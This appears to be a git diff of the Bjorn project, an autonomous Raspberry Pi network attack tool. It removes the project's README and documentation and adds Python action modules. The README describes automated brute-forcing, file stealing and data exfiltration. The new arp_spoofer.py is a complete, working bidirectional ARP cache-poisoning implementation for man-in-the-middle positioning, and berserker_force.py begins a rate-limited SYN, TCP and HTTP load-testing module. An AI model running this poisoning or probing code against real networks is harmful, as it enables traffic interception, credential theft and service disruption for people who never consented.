RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
```
Configure `usb0`:
```bash
sudo vi /etc/network/interfaces
```
Add:
```bash
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
```
Reload the services:
```bash
sudo systemctl daemon-reload
sudo systemctl enable systemd-networkd
sudo systemctl enable usb-gadget
sudo systemctl start systemd-networkd
sudo systemctl start usb-gadget
```
You must reboot to be able to use it as a USB gadget (with ip)
###### Windows PC Configuration
Set the static IP address on your Windows PC:
- **IP Address**: `172.20.2.2`
- **Subnet Mask**: `255.255.255.0`
- **Default Gateway**: `172.20.2.1`
- **DNS Servers**: `8.8.8.8`, `8.8.4.4`
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

21
LICENSE
View File

@@ -1,21 +0,0 @@
MIT License
Copyright (c) 2024 infinition
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

177
README.md
View File

@@ -1,177 +0,0 @@
# <img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="33"> Bjorn
![Python](https://img.shields.io/badge/Python-3776AB?logo=python&logoColor=fff)
![Status](https://img.shields.io/badge/Status-Development-blue.svg)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Reddit](https://img.shields.io/badge/Reddit-Bjorn__CyberViking-orange?style=for-the-badge&logo=reddit)](https://www.reddit.com/r/Bjorn_CyberViking)
[![Discord](https://img.shields.io/badge/Discord-Join%20Us-7289DA?style=for-the-badge&logo=discord)](https://discord.com/invite/B3ZH9taVfT)
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="150">
<img src="https://github.com/user-attachments/assets/1b490f07-f28e-4418-8d41-14f1492890c6" alt="bjorn_epd-removebg-preview" width="150">
</p>
Bjorn is a « Tamagotchi like » sophisticated, autonomous network scanning, vulnerability assessment, and offensive security tool designed to run on a Raspberry Pi equipped with a 2.13-inch e-Paper HAT. This document provides a detailed explanation of the project.
## 📚 Table of Contents
- [Introduction](#-introduction)
- [Features](#-features)
- [Getting Started](#-getting-started)
- [Prerequisites](#-prerequisites)
- [Installation](#-installation)
- [Quick Start](#-quick-start)
- [Usage Example](#-usage-example)
- [Contributing](#-contributing)
- [License](#-license)
- [Contact](#-contact)
## 📄 Introduction
Bjorn is a powerful tool designed to perform comprehensive network scanning, vulnerability assessment, and data ex-filtration. Its modular design and extensive configuration options allow for flexible and targeted operations. By combining different actions and orchestrating them intelligently, Bjorn can provide valuable insights into network security and help identify and mitigate potential risks.
The e-Paper HAT display and web interface make it easy to monitor and interact with Bjorn, providing real-time updates and status information. With its extensible architecture and customizable actions, Bjorn can be adapted to suit a wide range of security testing and monitoring needs.
## 🌟 Features
- **Network Scanning**: Identifies live hosts and open ports on the network.
- **Vulnerability Assessment**: Performs vulnerability scans using Nmap and other tools.
- **System Attacks**: Conducts brute-force attacks on various services (FTP, SSH, SMB, RDP, Telnet, SQL).
- **File Stealing**: Extracts data from vulnerable services.
- **User Interface**: Real-time display on the e-Paper HAT and web interface for monitoring and interaction.
![Bjorn Display](https://github.com/infinition/Bjorn/assets/37984399/bcad830d-77d6-4f3e-833d-473eadd33921)
## 🚀 Getting Started
## 📌 Prerequisites
### 📋 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📋 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
I did not develop Bjorn for the raspberry pi zero w2 64bits, but several feedbacks have attested that the installation worked perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment the paper screen v2 v4 have been tested and implemented.
I juste hope the V1 & V3 will work the same.
### 🔨 Installation
The fastest way to install Bjorn is using the automatic installation script :
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh && sudo ./install_bjorn.sh
# Choose the choice 1 for automatic installation. It may take a while as a lot of packages and modules will be installed. You must reboot at the end.
```
For **detailed information** about **installation** process go to [Install Guide](INSTALL.md)
## ⚡ Quick Start
**Need help ? You struggle to find Bjorn's IP after the installation ?**
Use my Bjorn Detector & SSH Launcher :
[https://github.com/infinition/bjorn-detector](https://github.com/infinition/bjorn-detector)
![ezgif-1-a310f5fe8f](https://github.com/user-attachments/assets/182f82f0-5c3a-48a9-a75e-37b9cfa2263a)
**Hmm, You still need help ?**
For **detailed information** about **troubleshooting** go to [Troubleshooting](TROUBLESHOOTING.md)
**Quick Installation**: you can use the fastest way to install **Bjorn** [Getting Started](#-getting-started)
## 💡 Usage Example
Here's a demonstration of how Bjorn autonomously hunts through your network like a Viking raider (fake demo for illustration):
```bash
# Reconnaissance Phase
[NetworkScanner] Discovering alive hosts...
[+] Host found: 192.168.1.100
├── Ports: 22,80,445,3306
└── MAC: 00:11:22:33:44:55
# Attack Sequence
[NmapVulnScanner] Found vulnerabilities on 192.168.1.100
├── MySQL 5.5 < 5.7 - User Enumeration
└── SMB - EternalBlue Candidate
[SSHBruteforce] Cracking credentials...
[+] Success! user:password123
[StealFilesSSH] Extracting sensitive data...
# Automated Data Exfiltration
[SQLBruteforce] Database accessed!
[StealDataSQL] Dumping tables...
[SMBBruteforce] Share accessible
[+] Found config files, credentials, backups...
```
This is just a demo output - actual results will vary based on your network and target configuration.
All discovered data is automatically organized in the data/output/ directory, viewable through both the e-Paper display (as indicators) and web interface.
Bjorn works tirelessly, expanding its network knowledge base and growing stronger with each discovery.
No constant monitoring needed - just deploy and let Bjorn do what it does best: hunt for vulnerabilities.
🔧 Expand Bjorn's Arsenal!
Bjorn is designed to be a community-driven weapon forge. Create and share your own attack modules!
⚠️ **For educational and authorized testing purposes only** ⚠️
## 🤝 Contributing
The project welcomes contributions in:
- New attack modules.
- Bug fixes.
- Documentation.
- Feature improvements.
For **detailed information** about **contributing** process go to [Contributing Docs](CONTRIBUTING.md), [Code Of Conduct](CODE_OF_CONDUCT.md) and [Development Guide](DEVELOPMENT.md).
## 📫 Contact
- **Report Issues**: Via GitHub.
- **Guidelines**:
- Follow ethical guidelines.
- Document reproduction steps.
- Provide logs and context.
- **Author**: __infinition__
- **GitHub**: [infinition/Bjorn](https://github.com/infinition/Bjorn)
## 🌠 Stargazers
[![Star History Chart](https://api.star-history.com/svg?repos=infinition/bjorn&type=Date)](https://star-history.com/#infinition/bjorn&Date)
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,48 +0,0 @@
# 🔒 Security Policy
Security Policy for **Bjorn** repository includes all required compliance matrix and artifact mapping.
## 🧮 Supported Versions
We provide security updates for the following versions of our project:
| Version | Status | Secure |
| ------- |-------------| ------ |
| 1.0.0 | Development | No |
## 🛡️ Security Practices
- We follow best practices for secure coding and infrastructure management.
- Regular security audits and code reviews are conducted to identify and mitigate potential risks.
- Dependencies are monitored and updated to address known vulnerabilities.
## 📲 Security Updates
- Security updates are released as soon as possible after a vulnerability is confirmed.
- Users are encouraged to update to the latest version to benefit from security fixes.
## 🚨 Reporting a Vulnerability
If you discover a security vulnerability within this project, please follow these steps:
1. **Do not create a public issue.** Instead, contact us directly to responsibly disclose the vulnerability.
2. **Email** [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com) with the following information:
- A description of the vulnerability.
- Steps to reproduce the issue.
- Any potential impact or severity.
3. **Wait for a response.** We will acknowledge your report and work with you to address the issue promptly.
## 🛰️ Additional Resources
- [OWASP Security Guidelines](https://owasp.org/)
Thank you for helping us keep this project secure!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

View File

@@ -1,80 +0,0 @@
# 🐛 Known Issues and Troubleshooting
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Current Development Issues](#-current-development-issues)
- [Troubleshooting Steps](#-troubleshooting-steps)
- [License](#-license)
## 🪲 Current Development Issues
### Long Runtime Issue
- **Problem**: `OSError: [Errno 24] Too many open files`
- **Status**: Partially resolved with system limits configuration.
- **Workaround**: Implemented file descriptor limits increase.
- **Monitoring**: Check open files with `lsof -p $(pgrep -f Bjorn.py) | wc -l`
- At the moment the logs show periodically this information as (FD : XXX)
## 🛠️ Troubleshooting Steps
### Service Issues
```bash
#See bjorn journalctl service
journalctl -fu bjorn.service
# Check service status
sudo systemctl status bjorn.service
# View detailed logs
sudo journalctl -u bjorn.service -f
or
sudo tail -f /home/bjorn/Bjorn/data/logs/*
# Check port 8000 usage
sudo lsof -i :8000
```
### Display Issues
```bash
# Verify SPI devices
ls /dev/spi*
# Check user permissions
sudo usermod -a -G spi,gpio bjorn
```
### Network Issues
```bash
# Check network interfaces
ip addr show
# Test USB gadget interface
ip link show usb0
```
### Permission Issues
```bash
# Fix ownership
sudo chown -R bjorn:bjorn /home/bjorn/Bjorn
# Fix permissions
sudo chmod -R 755 /home/bjorn/Bjorn
```
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

1651
action_scheduler.py Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -1,15 +1,9 @@
#Test script to add more actions to BJORN
from rich.console import Console
from shared import SharedData
b_class = "IDLE"
b_module = "idle_action"
b_status = "idle_action"
b_port = None
b_parent = None
b_module = "idle"
b_status = "IDLE"
console = Console()
class IDLE:
def __init__(self, shared_data):

Binary file not shown.

After

Width:  |  Height:  |  Size: 23 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 20 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 16 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 20 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 7.1 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 6.6 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 21 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 23 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 15 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 23 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 21 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 14 KiB

330
actions/arp_spoofer.py Normal file
View File

@@ -0,0 +1,330 @@
"""
arp_spoofer.py — ARP Cache Poisoning for Man-in-the-Middle positioning.
Ethical cybersecurity lab action for Bjorn framework.
Performs bidirectional ARP spoofing between a target host and the network
gateway. Restores ARP tables on completion or interruption.
SQL mode:
- Orchestrator provides (ip, port, row) for the target host.
- Gateway IP is auto-detected from system routing table or shared config.
- Results persisted to JSON output and logged for RL training.
- Fully integrated with EPD display (progress, status, comments).
"""
import os
import time
import logging
import json
import subprocess
import datetime
from typing import Dict, Optional, Tuple
from shared import SharedData
from logger import Logger
logger = Logger(name="arp_spoofer.py", level=logging.DEBUG)
# Silence scapy warnings
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy").setLevel(logging.ERROR)
# ──────────────────────── Action Metadata ────────────────────────
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_status = "arp_spoof"
b_port = None
b_service = '[]'
b_trigger = "on_host_alive"
b_parent = None
b_action = "aggressive"
b_category = "network_attack"
b_name = "ARP Spoofer"
b_description = (
"Bidirectional ARP cache poisoning between target host and gateway for "
"MITM positioning. Detects gateway automatically, spoofs both directions, "
"and cleanly restores ARP tables on completion. Educational lab use only."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "ARPSpoof.png"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 30
b_cooldown = 3600
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 2
b_risk_level = "high"
b_enabled = 1
b_tags = ["mitm", "arp", "network", "layer2"]
b_args = {
"duration": {
"type": "slider", "label": "Duration (s)",
"min": 10, "max": 300, "step": 10, "default": 60,
"help": "How long to maintain the ARP poison (seconds)."
},
"interval": {
"type": "slider", "label": "Packet interval (s)",
"min": 1, "max": 10, "step": 1, "default": 2,
"help": "Delay between ARP poison packets."
},
}
b_examples = [
{"duration": 60, "interval": 2},
{"duration": 120, "interval": 1},
]
b_docs_url = "docs/actions/ARPSpoof.md"
# ──────────────────────── Constants ──────────────────────────────
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "arp")
class ARPSpoof:
"""ARP cache poisoning action integrated with Bjorn orchestrator."""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self._scapy_ok = False
self._check_scapy()
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except OSError:
pass
logger.info("ARPSpoof initialized")
def _check_scapy(self):
try:
from scapy.all import ARP, Ether, sendp, sr1 # noqa: F401
self._scapy_ok = True
except ImportError:
logger.error("scapy not available — ARPSpoof will not function")
self._scapy_ok = False
# ─────────────────── Identity Cache ──────────────────────
def _refresh_ip_identity_cache(self):
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hn = (r.get("hostnames") or "").split(";", 1)[0]
for ip_addr in [p.strip() for p in (r.get("ips") or "").split(";") if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, hn)
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
# ─────────────────── Gateway Detection ──────────────────
def _detect_gateway(self) -> Optional[str]:
"""Auto-detect the default gateway IP."""
gw = getattr(self.shared_data, "gateway_ip", None)
if gw and gw != "0.0.0.0":
return gw
try:
result = subprocess.run(
["ip", "route", "show", "default"],
capture_output=True, text=True, timeout=5
)
if result.returncode == 0 and result.stdout.strip():
parts = result.stdout.strip().split("\n")[0].split()
idx = parts.index("via") if "via" in parts else -1
if idx >= 0 and idx + 1 < len(parts):
return parts[idx + 1]
except Exception as e:
logger.debug(f"Gateway detection via ip route failed: {e}")
try:
from scapy.all import conf as scapy_conf
gw = scapy_conf.route.route("0.0.0.0")[2]
if gw and gw != "0.0.0.0":
return gw
except Exception as e:
logger.debug(f"Gateway detection via scapy failed: {e}")
return None
# ─────────────────── ARP Operations ──────────────────────
@staticmethod
def _get_mac_via_arp(ip: str, iface: str = None, timeout: float = 2.0) -> Optional[str]:
"""Resolve IP to MAC via ARP request."""
try:
from scapy.all import ARP, sr1
kwargs = {"timeout": timeout, "verbose": False}
if iface:
kwargs["iface"] = iface
resp = sr1(ARP(pdst=ip), **kwargs)
if resp and hasattr(resp, "hwsrc"):
return resp.hwsrc
except Exception as e:
logger.debug(f"ARP resolution failed for {ip}: {e}")
return None
@staticmethod
def _send_arp_poison(target_ip, target_mac, spoof_ip, iface=None):
"""Send a single ARP poison packet (op=is-at)."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip
)
kwargs = {"verbose": False}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP poison send failed to {target_ip}: {e}")
@staticmethod
def _send_arp_restore(target_ip, target_mac, real_ip, real_mac, iface=None):
"""Restore legitimate ARP mapping with multiple packets."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac,
psrc=real_ip, hwsrc=real_mac
)
kwargs = {"verbose": False, "count": 5}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP restore failed for {target_ip}: {e}")
# ─────────────────── Main Execute ────────────────────────
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""Execute bidirectional ARP spoofing against target host."""
self.shared_data.bjorn_orch_status = "ARPSpoof"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip}
if not self._scapy_ok:
logger.error("scapy unavailable, cannot perform ARP spoof")
return "failed"
target_mac = None
gateway_mac = None
gateway_ip = None
iface = None
try:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or ""
hostname = row.get("Hostname") or row.get("hostname") or ""
# 1) Detect gateway
gateway_ip = self._detect_gateway()
if not gateway_ip:
logger.error(f"Cannot detect gateway for ARP spoof on {ip}")
return "failed"
if gateway_ip == ip:
logger.warning(f"Target {ip} IS the gateway — skipping")
return "failed"
logger.info(f"ARP Spoof: target={ip} gateway={gateway_ip}")
self.shared_data.log_milestone(b_class, "GatewayID", f"Poisoning {ip} <-> {gateway_ip}")
self.shared_data.comment_params = {"ip": ip, "gateway": gateway_ip}
self.shared_data.bjorn_progress = "10%"
# 2) Resolve MACs
iface = getattr(self.shared_data, "default_network_interface", None)
target_mac = self._get_mac_via_arp(ip, iface)
gateway_mac = self._get_mac_via_arp(gateway_ip, iface)
if not target_mac:
logger.error(f"Cannot resolve MAC for target {ip}")
return "failed"
if not gateway_mac:
logger.error(f"Cannot resolve MAC for gateway {gateway_ip}")
return "failed"
self.shared_data.bjorn_progress = "20%"
logger.info(f"Resolved — target_mac={target_mac}, gateway_mac={gateway_mac}")
self.shared_data.log_milestone(b_class, "PoisonActive", f"MACs resolved, starting spoof")
# 3) Spoofing loop
duration = int(getattr(self.shared_data, "arp_spoof_duration", 60))
interval = max(1, int(getattr(self.shared_data, "arp_spoof_interval", 2)))
packets_sent = 0
start_time = time.time()
while (time.time() - start_time) < duration:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit — stopping ARP spoof")
break
self._send_arp_poison(ip, target_mac, gateway_ip, iface)
self._send_arp_poison(gateway_ip, gateway_mac, ip, iface)
packets_sent += 2
elapsed = time.time() - start_time
pct = min(90, int(20 + (elapsed / max(duration, 1)) * 70))
self.shared_data.bjorn_progress = f"{pct}%"
if packets_sent % 20 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Injected {packets_sent} poison pkts")
time.sleep(interval)
# 4) Restore ARP tables
self.shared_data.bjorn_progress = "95%"
logger.info("Restoring ARP tables...")
self.shared_data.log_milestone(b_class, "RestoreStart", f"Healing {ip} and {gateway_ip}")
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
# 5) Save results
elapsed_total = time.time() - start_time
result_data = {
"timestamp": datetime.datetime.now().isoformat(),
"target_ip": ip, "target_mac": target_mac,
"gateway_ip": gateway_ip, "gateway_mac": gateway_mac,
"duration_s": round(elapsed_total, 1),
"packets_sent": packets_sent,
"hostname": hostname, "mac_address": mac
}
try:
ts = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
out_file = os.path.join(OUTPUT_DIR, f"arp_spoof_{ip}_{ts}.json")
with open(out_file, "w") as f:
json.dump(result_data, f, indent=2)
except Exception as e:
logger.error(f"Failed to save results: {e}")
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Restored tables after {packets_sent} pkts")
return "success"
except Exception as e:
logger.error(f"ARPSpoof failed for {ip}: {e}")
if target_mac and gateway_mac and gateway_ip:
try:
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
logger.info("Emergency ARP restore sent after error")
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
if __name__ == "__main__":
shared_data = SharedData()
try:
spoofer = ARPSpoof(shared_data)
logger.info("ARPSpoof module ready.")
except Exception as e:
logger.error(f"Error: {e}")

617
actions/berserker_force.py Normal file
View File

@@ -0,0 +1,617 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
berserker_force.py -- Service resilience / stress testing (Pi Zero friendly, orchestrator compatible).
What it does:
- Phase 1 (Baseline): Measures TCP connect response times per port (3 samples each).
- Phase 2 (Stress Test): Runs a rate-limited load test using TCP connect, optional SYN probes
(scapy), HTTP probes (urllib), or mixed mode.
- Phase 3 (Post-stress): Re-measures baseline to detect degradation.
- Phase 4 (Analysis): Computes per-port degradation percentages, writes a JSON report.
This is NOT a DoS tool. It sends measured, rate-limited probes and records how the
target's response times change under light load. Max 50 req/s to stay RPi-safe.
Output is saved to data/output/stress/<ip>_<timestamp>.json
"""
import json
import logging
import os
import random
import socket
import ssl
import statistics
import time
import threading
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional, Tuple
from urllib.request import Request, urlopen
from urllib.error import URLError
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="berserker_force.py", level=logging.DEBUG)
# -------------------- Scapy (optional) ----------------------------------------
_HAS_SCAPY = False
try:
from scapy.all import IP, TCP, sr1, conf as scapy_conf # type: ignore
_HAS_SCAPY = True
except ImportError:
logger.info("scapy not available -- SYN probe mode will fall back to TCP connect")
# -------------------- Action metadata (AST-friendly) --------------------------
b_class = "BerserkerForce"
b_module = "berserker_force"
b_status = "berserker_force"
b_port = None
b_parent = None
b_service = '[]'
b_trigger = "on_port_change"
b_action = "aggressive"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 15
b_cooldown = 7200
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 1
b_risk_level = "high"
b_enabled = 1
b_category = "stress"
b_name = "Berserker Force"
b_description = (
"Service resilience and stress-testing action. Measures baseline response "
"times, applies controlled TCP/SYN/HTTP load, then re-measures to quantify "
"degradation. Rate-limited to 50 req/s max (RPi-safe). No actual DoS -- "
"just measured probing with structured JSON reporting."
)
b_author = "Bjorn Community"
b_version = "2.0.0"
b_icon = "BerserkerForce.png"
b_tags = ["stress", "availability", "resilience"]
b_args = {
"mode": {
"type": "select",
"label": "Probe mode",
"choices": ["tcp", "syn", "http", "mixed"],
"default": "tcp",
"help": "tcp = connect probe, syn = SYN via scapy (needs root), "
"http = urllib GET for web ports, mixed = random pick per probe.",
},
"duration": {
"type": "slider",
"label": "Stress duration (s)",
"min": 10,
"max": 120,
"step": 5,
"default": 30,
"help": "How long the stress phase runs in seconds.",
},
"rate": {
"type": "slider",
"label": "Probes per second",
"min": 1,
"max": 50,
"step": 1,
"default": 20,
"help": "Max probes per second (clamped to 50 for RPi safety).",
},
}
b_examples = [
{"mode": "tcp", "duration": 30, "rate": 20},
{"mode": "mixed", "duration": 60, "rate": 40},
{"mode": "syn", "duration": 20, "rate": 10},
]
b_docs_url = "docs/actions/BerserkerForce.md"
# -------------------- Constants -----------------------------------------------
_DATA_DIR = "/home/bjorn/Bjorn/data"
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "stress")
_BASELINE_SAMPLES = 3 # TCP connect samples per port for baseline
_CONNECT_TIMEOUT_S = 2.0 # socket connect timeout
_HTTP_TIMEOUT_S = 3.0 # urllib timeout
_MAX_RATE = 50 # hard ceiling probes/s (RPi guard)
_WEB_PORTS = {80, 443, 8080, 8443, 8000, 8888, 9443, 3000, 5000}
# -------------------- Helpers -------------------------------------------------
def _tcp_connect_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Return round-trip TCP connect time in seconds, or None on failure."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout_s)
try:
t0 = time.monotonic()
err = sock.connect_ex((ip, int(port)))
elapsed = time.monotonic() - t0
return elapsed if err == 0 else None
except Exception:
return None
finally:
try:
sock.close()
except Exception:
pass
def _syn_probe_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Send a SYN via scapy and measure SYN-ACK time. Falls back to TCP connect."""
if not _HAS_SCAPY:
return _tcp_connect_time(ip, port, timeout_s)
try:
pkt = IP(dst=ip) / TCP(dport=int(port), flags="S", seq=random.randint(0, 0xFFFFFFFF))
t0 = time.monotonic()
resp = sr1(pkt, timeout=timeout_s, verbose=0)
elapsed = time.monotonic() - t0
if resp and resp.haslayer(TCP):
flags = resp[TCP].flags
# SYN-ACK (0x12) or RST (0x14) both count as "responded"
if flags in (0x12, 0x14, "SA", "RA"):
# Send RST to be polite
try:
from scapy.all import send as scapy_send # type: ignore
rst = IP(dst=ip) / TCP(dport=int(port), flags="R", seq=resp[TCP].ack)
scapy_send(rst, verbose=0)
except Exception:
pass
return elapsed
return None
except Exception:
return _tcp_connect_time(ip, port, timeout_s)
def _http_probe_time(ip: str, port: int, timeout_s: float = _HTTP_TIMEOUT_S) -> Optional[float]:
"""Send an HTTP HEAD/GET and measure response time via urllib."""
scheme = "https" if int(port) in {443, 8443, 9443} else "http"
url = f"{scheme}://{ip}:{port}/"
ctx = None
if scheme == "https":
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
try:
req = Request(url, method="HEAD", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp = urlopen(req, timeout=timeout_s, context=ctx) if ctx else urlopen(req, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp.close()
return elapsed
except Exception:
# Fallback: even a refused connection or error page counts
try:
req2 = Request(url, method="GET", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp2 = urlopen(req2, timeout=timeout_s, context=ctx) if ctx else urlopen(req2, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp2.close()
return elapsed
except URLError:
return None
except Exception:
return None
def _pick_probe_func(mode: str, port: int):
"""Return the probe function appropriate for the requested mode + port."""
if mode == "tcp":
return _tcp_connect_time
elif mode == "syn":
return _syn_probe_time
elif mode == "http":
if int(port) in _WEB_PORTS:
return _http_probe_time
return _tcp_connect_time # non-web port falls back
elif mode == "mixed":
candidates = [_tcp_connect_time]
if _HAS_SCAPY:
candidates.append(_syn_probe_time)
if int(port) in _WEB_PORTS:
candidates.append(_http_probe_time)
return random.choice(candidates)
return _tcp_connect_time
def _safe_mean(values: List[float]) -> float:
return statistics.mean(values) if values else 0.0
def _safe_stdev(values: List[float]) -> float:
return statistics.stdev(values) if len(values) >= 2 else 0.0
def _degradation_pct(baseline_mean: float, post_mean: float) -> float:
"""Percentage increase from baseline to post-stress. Positive = slower."""
if baseline_mean <= 0:
return 0.0
return round(((post_mean - baseline_mean) / baseline_mean) * 100.0, 2)
# -------------------- Main class ----------------------------------------------
class BerserkerForce:
"""Service resilience tester -- orchestrator-compatible Bjorn action."""
def __init__(self, shared_data):
self.shared_data = shared_data
# ------------------------------------------------------------------ #
# Phase helpers #
# ------------------------------------------------------------------ #
def _resolve_ports(self, ip: str, port, row: Dict) -> List[int]:
"""Gather target ports from the port argument, row data, or DB hosts table."""
ports: List[int] = []
# 1) Explicit port argument
try:
